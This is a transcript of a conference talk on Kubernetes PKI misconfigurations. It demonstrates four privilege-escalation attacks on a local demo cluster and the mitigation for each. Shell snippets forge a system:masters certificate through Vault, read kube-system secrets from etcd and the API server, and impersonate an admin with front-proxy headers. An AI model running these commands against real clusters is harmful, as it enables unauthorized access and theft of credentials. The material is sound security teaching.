Hi. Thank you so much for coming and joining me for PKI: The Wrong Way. I'm Tabitha Sable. I work as a systems security engineer at Datadog. We're a cloud native monitoring provider, so we handle trillions of data points per day across product features like log analysis, metrics aggregation, security monitoring, and application performance monitoring. There's extensive infrastructure to support all of those product features, with dozens of Kubernetes clusters and tens of thousands of nodes. I focus on hacking, hardening, and defending that infrastructure, and helping to ensure that our operations teams and security teams are working together and always helping to level each other up. I also try to chop wood and carry water for upstream Kubernetes by serving as a co-chair of Kubernetes SIG Security and an associate member of the Product Security Committee.

The goals for today: what I'm really hoping to do here is to share some lessons I've learned from Kubernetes security research I've done, and to encourage you to think about your clusters the way an adversary would think about them. And also I want to have fun and just have a chance to say, "hey, watch this."

So what's on the hacker agenda? First, we'll review what's going on inside a Kubernetes control plane, specifically around the use of TLS. Then we'll walk through four demos where we hack a Kubernetes cluster because of oversights in its configuration and use of TLS.

So we'll jump right into that review. The first thing we need to deal with is too many acronyms. This talk is inevitably going to be filled with acronyms, and I want to make sure we all start off in the same place. One of the most key ones in this talk is TLS, Transport Layer Security. This is a protocol that usually sits on top of TCP, and it provides an encrypted and authenticated data stream from a client to a server.
TLS uses public key cryptography for the server to prove its identity to the client. Mutual TLS is an optional extension to TLS where the client also uses public key cryptography to prove its identity to the server; thus, each has authenticated the other, mutually. The way they do that is by use of a certifying authority (CA). This is a public key certificate that signs other certificates, and so if software trusts a particular certifying authority, then by extension it believes in and trusts every certificate signed by that certifying authority. This extends into the concept of public key infrastructure (PKI), which is like the entire family tree of certifying authorities that have potentially signed other certifying authorities, eventually signing the certificates that are used by clients and servers.

Here is your basic Kubernetes architecture diagram, with etcd there holding all of the state, the API server in the center of the world, and everything else talking to the API server. And of course, occasionally the API server talks out to other things as well.

Within etcd: etcd uses mutual TLS both to authenticate client connections into the etcd cluster, and for peer connections between nodes in an etcd cluster. The API server makes the most complex use of TLS within the Kubernetes control plane. It performs mutual TLS authentication of clients that connect to it, but it is itself also a mutual TLS client when it connects to etcd, the kubelet, and various other components. Furthermore, there is the front proxy, or aggregation layer, configured by the --requestheader-* arguments to the API server. The API server performs separate mutual TLS authentication of requests that are coming in from a proxy server in front of it, and it also uses mutual TLS to authenticate itself to extension API servers when you access them through it.
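That CA trust relationship can be illustrated with a minimal local sketch using openssl. Everything here is a throwaway stand-in (hypothetical names, temporary keys), not anything from the demo cluster:

```shell
# Work in a scratch directory with throwaway keys.
cd "$(mktemp -d)"

# Create a self-signed "certifying authority".
openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
  -keyout ca-key.pem -out ca.pem -subj "/CN=demo-ca"

# Create a client key and certificate signing request, then sign it with the CA.
openssl req -newkey rsa:2048 -nodes \
  -keyout client-key.pem -out client.csr -subj "/CN=tabby/O=cats"
openssl x509 -req -in client.csr -CA ca.pem -CAkey ca-key.pem \
  -CAcreateserial -days 1 -out client.pem

# Anything that trusts ca.pem now trusts client.pem by extension.
openssl verify -CAfile ca.pem client.pem   # prints "client.pem: OK"
```

Software that is handed ca.pem as a trust root will accept every certificate signed by that key, which is exactly the property the demos below abuse.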
The kubelet and other parts of the control plane also use mutual TLS when they communicate with the API server, and most of them offer a metrics endpoint or some small API, using mutual TLS authentication of client connections to that. Then there are your own applications, which likely include plain TLS servers, like for web services, and may include mutual TLS servers or clients: for example, if you are using a service mesh, or if you're doing authentication between some application server and a backend database.

With that all taken care of, let's hop in and actually hack some clusters. The first situation we'll work through is based on the idea that your certifying authority controls the issuance of credentials for your Kubernetes cluster. No matter how sophisticated the RBAC configuration in your Kubernetes cluster may be, if your certifying authority is too free in who it issues certificates to, then you may have a vulnerability there. So we're going to access our certifying authority, acquire a certificate inappropriately, and use that to become cluster-admin.

The local kind cluster that's been provisioned here uses HashiCorp Vault as an external certifying authority, which has provisioned the many certificates and keys needed to make a Kubernetes cluster work. And in this case, my Vault configuration is not very well locked down. One of the workloads on this Kubernetes cluster is a basic HTTPS web server, and it is configured to be able to access the Vault cluster in order to generate the TLS keys that it needs to offer web service. Let's take a quick look at the certificate: it's issued for www.example.net by the demo example.net PKI. Great. And the way that it's able to do that is because it has a Vault token mounted into it.
This particular Vault token is a human-readable string, because this is a demo and I wanted it to be easy to set up, but usually it would be some long random secret value. With this certificate, I shouldn't be able to do anything interesting, but I know that I can access Vault. So if I'm able to access more within Vault than I should be able to, maybe I can get a better certificate that's useful in the Kubernetes cluster.

I want a certificate that specifically has the organization system:masters in its distinguished name, because in a default Kubernetes cluster, there's a ClusterRoleBinding from that group to cluster-admin. Furthermore, that particular group is special and has all privileges within the Kubernetes control plane even if you delete that role binding. This is kind of confusing, but it's necessary for internal communication within the API server itself.

So I'm going to make this OpenSSL configuration file so that I can run an openssl req command to generate a certificate signing request. Now, normally I should not be able to access the dangerous sign-verbatim endpoint of Vault, because Vault will sign anything I send to it. But in this case, the Vault administrators have not been very careful, and I do have access to it. So I can use vault write with the path to the Kubernetes PKI (notice: not the demo example.net PKI), and submit the certificate signing request. Now I have the resulting certificate in a shell variable as JSON, so I'll use jq to write it out in a nice format into a certificate file. And we can look at the resulting certificate, issued by the demo Kubernetes PKI for a goose who's a member of the system:masters group. This is exactly the key that we wanted. With this certificate, we can talk to the API server. I don't have kubectl inside this web server pod, and it would look pretty suspicious if I downloaded it.
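The CSR step can be sketched like this. The file names are made up for illustration, and the Vault mount path shown in the trailing comment is an assumption that would differ per deployment:

```shell
cd "$(mktemp -d)"

# O= in the subject becomes a Kubernetes group; system:masters is bound
# to cluster-admin in a default cluster.
cat > csr.cnf <<'EOF'
[ req ]
distinguished_name = dn
prompt = no

[ dn ]
CN = goose
O = system:masters
EOF

# Generate a fresh key and a CSR carrying that subject.
openssl req -new -newkey rsa:2048 -nodes \
  -keyout goose-key.pem -config csr.cnf -out goose.csr

# Inspect the subject the CA will be asked to sign verbatim.
openssl req -in goose.csr -noout -subject

# With overly broad Vault permissions, the CSR could then be submitted to a
# sign-verbatim endpoint, e.g. (hypothetical mount path):
#   vault write -format=json kubernetes-pki/sign-verbatim csr=@goose.csr
```

Vault's PKI sign-verbatim endpoint signs whatever subject the CSR carries, which is why a properly scoped Vault role, rather than sign-verbatim access, matters so much here.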
So instead I'll use the notorious hacker tool curl to communicate with the API server and say: can I please have all of the secrets out of the kube-system namespace? Of course I can, because that's what the certificate says I should have access to.

So what did we learn from this, and how can we mitigate it? Treat your certifying authority permissions with care. Your CA configuration is an overlay over your RBAC configuration, and if your CA is willing to dispense certificates that people or services shouldn't have, then they will be able to get them. Use least privilege when you're configuring your CA. Specifically for Vault, you can set up roles that specify exactly what settings are allowed to be in the certificate, and that can prevent access to other settings that would be inappropriate.

We'll move on to another demo here, which is: what happens if you only have one independent PKI in your Kubernetes cluster? As we discussed before, etcd uses mutual TLS to authenticate clients that are connecting to it, and in the usual configuration in a Kubernetes cluster, every certificate signed by the etcd CA has full access to the contents of etcd. And of course, etcd stores everything for your control plane. Therefore, if etcd trusts the same certifying authority that Kubernetes client credentials are issued from, you can simply submit a Kubernetes client certificate to etcd and access anything you want.

Let's see what that would look like. Here we are back at a normal shell, and I have a Kubernetes client certificate. You see it's issued by the demo Kubernetes PKI, and it's issued to me personally, tabby, from the group cats. Now, I happen to have etcdctl installed on my system, because I'm a system administrator. So what happens if I take this Kubernetes client cert and pass it to etcdctl and tell it to talk to my etcd cluster? I can just read out whatever values I want from etcd. I also could write whatever values I wanted into etcd.
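A sketch of what that etcdctl invocation might look like, with hypothetical file names and endpoint. The function prints the command instead of running it, so the shape of the request can be checked without a live etcd; drop the echo to run it for real:

```shell
ETCD_ENDPOINT="https://127.0.0.1:2379"   # assumption: a locally reachable etcd

# Build and print the etcdctl (v3 API) read. The cert/key here are an
# ordinary Kubernetes client credential, which etcd should NOT trust,
# but does when both share one CA.
etcd_read_sketch() {
  echo etcdctl --endpoints="$ETCD_ENDPOINT" \
    --cacert etcd-ca.pem --cert tabby.pem --key tabby-key.pem \
    get /registry/secrets/kube-system/ --prefix --keys-only
}

etcd_read_sketch
```

The /registry/secrets/... prefix is where Kubernetes stores Secret objects in etcd, so a plain key listing there is already a full credential dump.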
This client cert doesn't let me do very much when I pass it to the API server. But because I'm also able to inappropriately pass it to etcd, I can do anything I can imagine.

Now, what if I don't have etcdctl installed? Time was, you could just talk to etcd with curl, and in the etcd API version 2, that's how it works. But the etcd API version 3 uses gRPC, which is not nearly as human-readable. The etcd developers have taken care of us, though: there is an etcd feature, on by default, that lets you access the etcd v3 API through normal HTTP requests in addition to the gRPC protocol. You have to read a little bit of the documentation to learn how to access it, but once you've done so, you can submit a POST request to the appropriate endpoint with some JSON and base64-encoded query parameters, and pull the keys out of etcd with curl as well.

It does not have to be this way: etcd supports RBAC. Now, to use etcdctl I have to pass all these ugly arguments, so I'll make a shell alias so that the remaining commands are easier to read. We can enable etcd RBAC, and that can make this particular attack harder to pull off. It's relatively easy: you use the etcdctl user add and user grant-role commands. It's necessary to create a root user, and --no-password means that you can't log in with a password, only with mutual TLS. Then we'll also create a user called kube-apiserver-etcd-client, because that's the default CN in the client cert used by the API server when it accesses etcd. We bind the root role to both of these because we're not trying to restrict what the API server can do; we're only trying to restrict access to only the API server. After we've created those users and role grants, we can enable authentication.

Now that we've enabled authentication, what happens when I use etcdctl and pass my Kubernetes client cert in? I'm refused, because tabby isn't one of the users that has access to etcd anymore. But Kubernetes is still working.
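The curl-to-etcd request from earlier in this demo can be sketched like this. The endpoint path and port are assumptions (the JSON gateway path has moved across etcd versions: /v3alpha, then /v3beta, then /v3), and the gateway wants the key range base64-encoded:

```shell
# To read a whole prefix, range_end is the prefix with its last byte
# incremented ('/' -> '0'), per etcd's range semantics.
KEY="$(printf '/registry/secrets/kube-system/' | base64)"
RANGE_END="$(printf '/registry/secrets/kube-system0' | base64)"

# Against a live etcd, with a certificate its CA trusts, the request
# would look roughly like (hypothetical endpoint and file names):
#   curl --cacert etcd-ca.pem --cert client.pem --key client-key.pem \
#     https://127.0.0.1:2379/v3/kv/range \
#     -d "{\"key\": \"$KEY\", \"range_end\": \"$RANGE_END\"}"

echo "key=$KEY range_end=$RANGE_END"
```

The response comes back as JSON with base64-encoded keys and values, so jq plus base64 -d is enough to read everything out.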
I can still access the API server and do things. I'm going to go ahead and disable etcd authentication, because if I left it on, it would break some of the subsequent demos.

What have we learned from this, and how can we mitigate it? It's really critical to have separate PKIs for your etcd cluster and for your Kubernetes API server. Additionally, you can use network policy, whether with a firewall, with cloud provider ACLs, or, inside Kubernetes, with Kubernetes NetworkPolicy, to restrict who can even communicate with the etcd port. And if you like, you can enable etcd authorization. Using etcd authorization is a relatively uncommon configuration, so I definitely recommend that you test it first if you decide you want to use it. It can mitigate some of the hazard that comes from having this PKI shared, but it's really best to have separate PKIs.

We'll get into the next demo here, which involves my least favorite API server feature. The reason it's my least favorite is that one set of options enables two different features at once: the dangerous and uncommon front proxy authentication, where a proxy server passes headers to the API server and tells it who you are, and the harmless and common aggregation layer, where the API server functions as a proxy in order to talk to some other part of the Kubernetes API.

Front proxy authentication looks like this: the user uses mutual TLS or some other method to communicate with a proxy server the API server trusts. Then that proxy server communicates with the API server and passes special HTTP headers specifying the user on whose behalf it's working. The aggregation layer in front of an extension API server looks very similar, because it's actually the same workflow, except that the API server itself is the proxy in front of the extension API server. Take, for example, the metrics server that supports the horizontal pod autoscaler and kubectl top.
This is how it works: your user talks to the API server, and the API server communicates with the extension API server, metrics server, by using request header auth.

So, how will this attack work? It depends on a little bit of setup. In this cluster, the aggregation layer trusts the same CA as the main Kubernetes API server, and the command-line argument --requestheader-allowed-names is missing on the API server. This means that, right now in this cluster, any Kubernetes client cert can pass the appropriate HTTP headers to enable front proxy authentication. So that's what we're going to do. We'll submit our Kubernetes user cert to the API server, including the appropriate headers, which will allow us to authenticate as anyone and become cluster-admin.

To be able to communicate directly with the API server from this shell, first I need to find what port number my kind cluster is running the API server on. So we'll do that. Now I'm going to just use my Kubernetes client cert to try to get all the secrets from the kube-system namespace. And of course, it smacks my hand for that: tabby can't list secrets in the kube-system namespace, because that's not allowed. I'm not a cluster administrator. But that's fine, because I know that this cluster is misconfigured, or at least I'm willing to try it and find out. So now I'm doing the same curl call to the API server, but I'm saying: by the way, I'm a proxy server, and I'm communicating with you on behalf of this goose that is honking around in your system:masters group. Can I please have those kube-system secrets? For a goose like you, anything.

What can we do to mitigate this? It's important to use a separate PKI for the --requestheader-* options, with very strict access controls on it, because this PKI is more powerful than the usual one.
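Here's a dry-run sketch of that impersonation request. Everything in it is a stand-in: the port, the file names, and even the header names, which in a kubeadm-style cluster default to X-Remote-User and X-Remote-Group but are actually set by the --requestheader-username-headers and --requestheader-group-headers flags on your API server:

```shell
APISERVER="https://127.0.0.1:6443"             # assumption: kind's forwarded port
CERT=tabby.pem KEY=tabby-key.pem CA=kube-ca.pem # any cert the requestheader CA trusts

# Print the curl invocation for review; drop the echo to send it for real.
front_proxy_sketch() {
  echo curl --cert "$CERT" --key "$KEY" --cacert "$CA" \
    -H "X-Remote-User: goose" \
    -H "X-Remote-Group: system:masters" \
    "$APISERVER/api/v1/namespaces/kube-system/secrets"
}

front_proxy_sketch
```

With --requestheader-allowed-names set, the API server would only honor these headers from certificates whose CN appears in that list; with it missing, any cert the trusted CA signed can impersonate anyone.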
Also, when you're configuring this, make sure to pass all of the relevant arguments to the API server; look them up in the documentation. Alternately, you can pass no --requestheader-* arguments at all. This will cause the front proxy and extension API server features to be unconfigured. The downside of doing this is that extension API servers can't use the auto-discovery feature to learn how to configure themselves; you will have to pass command-line arguments to them to tell them how to accept connections from the API server. So that would be adopting an unusual configuration. But if you're willing to research which extension API servers you're using and how to configure them that way, it can reduce your need for separate PKIs and help to harden your configuration against these sorts of errors.

Another demo we can do here has to do with inappropriate trusting of chained PKIs. Earlier I said that a certifying authority can sign another certifying authority. This is a diagram of the CAs that are currently in the Vault cluster that's set up for our demo. There is one root CA, which has signed an intermediate CA, and that intermediate CA has signed five other CAs: for use by example.net, the front proxy feature of the API server, etcd, the API server itself, and another non-production Kubernetes cluster. But when those certificates were loaded into the cluster for mutual TLS client trust, the root certificate is the one that was loaded in as trusted.

So let's see some of the things that can happen when you trust too much of your PKI tree. For example, if the root CA is in the trusted CA file argument to etcd, then every certificate issued anywhere in the PKI tree is trusted by etcd. We'll be able to send in any certificate we want, such as an application certificate, and we'll be able to access etcd. So let's go ahead and do that.
We'll hop back into our web server pod here and review what the web server config looks like, and we'll paste in one of these curl calls that talks to etcd. The web server certificate is here in webserver.pem. Because it's signed by the example.net PKI, which is a grandchild of the root CA trusted by etcd, I can take my web server's server cert, send it to etcd, and say: give me all the kube-system secrets. And it says: happy to oblige.

Let's do another one of these hacks. If the root CA is in the --client-ca-file argument of the API server, then we can have cross-cluster access. Here is a kubeconfig for my Kubernetes client, and here is another kubeconfig for being a goose that is cluster-admin of the non-prod cluster. Notice that the issuer is different between the certificates in these two kubeconfigs. But because the API server is trusting the root CA and not the leaf CA, we can probably do some inappropriate access anyway. So we'll specify the non-prod Kubernetes admin kubeconfig to kubectl get secrets against our production cluster. And of course it gives them to us, because it doesn't know any better.

Another hack we can do here is similar, but it combines that root trust with the missing --requestheader-allowed-names, or with a CA that allows issuing certs for any name. In that case, we can submit our application certificate, like the one from the web server, directly to the API server. Our web server cert won't have the appropriate CN= or O= values in the certificate subject, but with --requestheader-allowed-names missing, that doesn't matter if we pass in the appropriate HTTP headers. Or, if the CA allows signing a cert with any name, we can go and sign a cert with the appropriate name and pass it in. So let's go ahead and do that. Again, we'll need to get into our web server. Let's take a quick look at the web server's certificate. We try to pass it into the API server, and the API server is not having it.
The user www.example.net can't access secrets; www.example.net isn't even a Kubernetes user. But even this is showing us something scary: the fact that we got permission denied here proves that the API server trusted our certificate, and it believes that we really are www.example.net. This is because it's misconfigured to trust the root CA. And because this cluster is also poorly configured with the missing --requestheader-allowed-names option, we can pass in the appropriate HTTP headers to say: hey, this is the system:masters goose, you should give us those secrets. And of course, it is obliged to do so.

So what can we do to mitigate all of these problems? The number one thing we can do to save ourselves from this issue is to use standalone certifying authorities. Chaining really has very little benefit in a Kubernetes context and leaves you open to making these sorts of mistakes. So just don't do it: use standalone CAs, and then you can't make this mistake in the first place. If, for some reason, you feel that you must use chained CAs, be very careful to only trust the leaf CA. In this case, for the kube-apiserver --client-ca-file argument, we would pass in the CA that's circled in green here on the diagram, not the root CA like what we did.

Other mitigations are also possible. Make sure that you have tight permissions on all of your CAs, because, going back to the beginning of the presentation, your CA's access control is a gate to your Kubernetes access control. While you're configuring those CA permissions, set the clientAuth and serverAuth extended key usage flags specifically on the certificates that need them. In the case of the web server cert being used to access the API server: if the CA had omitted the clientAuth flag from that web server cert, the attack wouldn't have worked, even though the other misconfigurations were present.
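The chained-trust problem from these demos can be reproduced locally with openssl; all names here are throwaway stand-ins. The grandchild web server cert verifies against the root, which is exactly the over-broad trust the demos abused, and the extendedKeyUsage check at the end is how you'd confirm a cert carries serverAuth but not clientAuth:

```shell
cd "$(mktemp -d)"

# Root CA, and an intermediate CA signed by it (CA:TRUE so it can act as a CA).
printf 'basicConstraints=critical,CA:TRUE\n' > ca-ext.cnf
openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
  -keyout root-key.pem -out root.pem -subj "/CN=demo-root-ca"
openssl req -newkey rsa:2048 -nodes \
  -keyout int-key.pem -out int.csr -subj "/CN=example-net-ca"
openssl x509 -req -in int.csr -CA root.pem -CAkey root-key.pem \
  -CAcreateserial -days 1 -extfile ca-ext.cnf -out int.pem

# A web server certificate signed by the intermediate, serverAuth only.
printf 'extendedKeyUsage=serverAuth\n' > eku.cnf
openssl req -newkey rsa:2048 -nodes \
  -keyout www-key.pem -out www.csr -subj "/CN=www.example.net"
openssl x509 -req -in www.csr -CA int.pem -CAkey int-key.pem \
  -CAcreateserial -days 1 -extfile eku.cnf -out www.pem

# Trusting the root means trusting the grandchild web server cert too.
openssl verify -CAfile root.pem -untrusted int.pem www.pem

# The cert's extended key usage: serverAuth is present, clientAuth is not.
openssl x509 -in www.pem -noout -ext extendedKeyUsage
```

A verifier configured with only the leaf CA it actually means to trust would never have accepted this certificate, and a client that checks extended key usage would reject it as a client credential even under the over-broad root trust.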
And again, if you wish to, you can enable etcd authentication, which would make some of these exploits harder.

To wrap this up: PKI is really complex. The configuration is complex, and there are many different command-line options, but all of those details matter. In nearly every case, if you misconfigure something, it creates some kind of opportunity to do something inappropriate. So you need to look at it creatively, because these particular hacks are just fun examples that I cooked up for us to share; there are certainly other ways in which PKI misconfigurations could be exploited in Kubernetes. The message here is really: use three separate certifying authorities per cluster, and make them standalone. And if you're unable to follow those rules that keep your life simpler, be very careful that you understand every option you're choosing.

Thank you so much for spending this time with me. It's been a lot of fun to honk at this cluster with you and to share the things that I've learned about some of the ways that TLS can go wrong. If you think this kind of thing is interesting, note that we are hiring: Datadog is looking for both security and operations people across all parts of the organization. You can talk to me online: I'm on Kubernetes Slack, I'm on Twitter, and you can send me email. And if you want to play along with some of these exploits, you can go to my GitHub and download the setup script and the demo notes that were used for this demo. So again, thanks a lot, and go have fun with your clusters.